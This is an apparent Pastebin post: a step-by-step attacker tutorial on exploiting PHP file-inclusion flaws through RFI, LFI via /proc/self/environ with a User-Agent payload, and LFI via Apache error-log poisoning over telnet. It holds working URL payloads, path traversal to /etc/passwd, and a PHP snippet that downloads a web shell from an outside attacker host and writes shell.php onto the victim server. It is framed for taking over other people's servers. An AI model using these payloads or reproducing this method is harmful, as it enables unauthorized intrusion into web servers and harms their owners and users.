Advertisement
psycholyzern

Untitled

Dec 29th, 2011
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.48 KB | None | 0 0
  1. This tutorial contains:
  2. -> RFI
  3. -> LFI method 1
  4. -> LFI method 2
  5.  
  6. First, I will start with the RFI method.
  7.  
  8. RFI or Remote File Inclusion is a technique which allows you to include a remote file(from a URL) to a webscript.
  9.  
  10. Let's say we have a website called
  11. Code:
  12. http://www.v1ct1mp4g31337.com/index.php?include=register.php
  13.  
  14. Now take a look at the part after "index.php?", do you see that "include=register.php" ? This is exactly what we are looking for.
  15.  
  16. Now try to include google by typing in
  17. Code:
  18. http://www.v1ct1mp4g31337.com/index.php?include=http://www.google.com
  19.  
  20. Now, if it displays the google page, you are able to include remote files. If it gives an error message, jump to the LFI part of the tutorial now.
  21.  
  22. Well, let's just say it worked and it displays google. Now we are going to include a shell(you can get one here). Do this by typing this into your URL bar:
  23. Code:
  24. http://www.v1ct1mp4g31337.com/index.php?include=http://www.z0mgh4x0rpage.com/mastershell.txt
  25.  
  26. WARNING: Put your shell ALWAYS in TXT format on your website, otherwise people will be able to access it and F*** with your server!!
  27.  
  28. Alright thats it! Now your shell is included and you can rape the victims webserver.
  29.  
  30. Now we are going for LFI method 1
  31.  
  32. NOTE: You will need FireFox and its addon Tamper Data to do this method!
  33.  
  34. LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
  35.  
  36. In this method we are going to upload a shell by accessing the proc/self/environ.
  37.  
  38. Now we have our page
  39. Code:
  40. http://www.v1ct1mp4g31337.com/index.php?include=register.php
  41.  
  42. And now we are going to do this:
  43. Code:
  44. http://www.v1ct1mp4g31337.com/index.php?include=../
  45.  
  46. If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
  47. Code:
  48. http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd
  49.  
  50. And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
  51. Code:
  52. http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd
  53. http://www.v1ct1mp4g31337.com/index.php?include=../../etc/passwd
  54. http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd
  55.  
  56. And so on. Now let's say we got to this URL
  57. Code:
  58. http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd
  59.  
  60. And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
  61. Code:
  62. http://www.v1ct1mp4g31337.com/index.php?include=../../../proc/self/environ
  63.  
  64. If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:
  65. PHP Code:
  66. <?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
  67. $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
  68.  
  69. This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.
  70.  
  71. Now simply access your shell by going to
  72. Code:
  73. http://www.v1ct1mp4g31337.com/shell.php
  74.  
  75. And rape the server.
  76.  
  77. Now LFI method 2
  78.  
  79. NOTE: This only works on apache servers!
  80.  
  81. Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log
  82.  
  83. If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
  84.  
  85. Now when you have found the file, open up cmd and type in
  86. Code:
  87. telnet www.v1ct1mp4g31337.com 80
  88.  
  89. When you are inside the telnet, you copy the following code(you use your own shell url ofc)
  90. PHP Code:
  91. <?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
  92. $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
  93.  
  94. Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).
  95.  
  96. Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:
  97.  
  98. Code:
  99. http://www.v1ct1mp4g31337.com/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement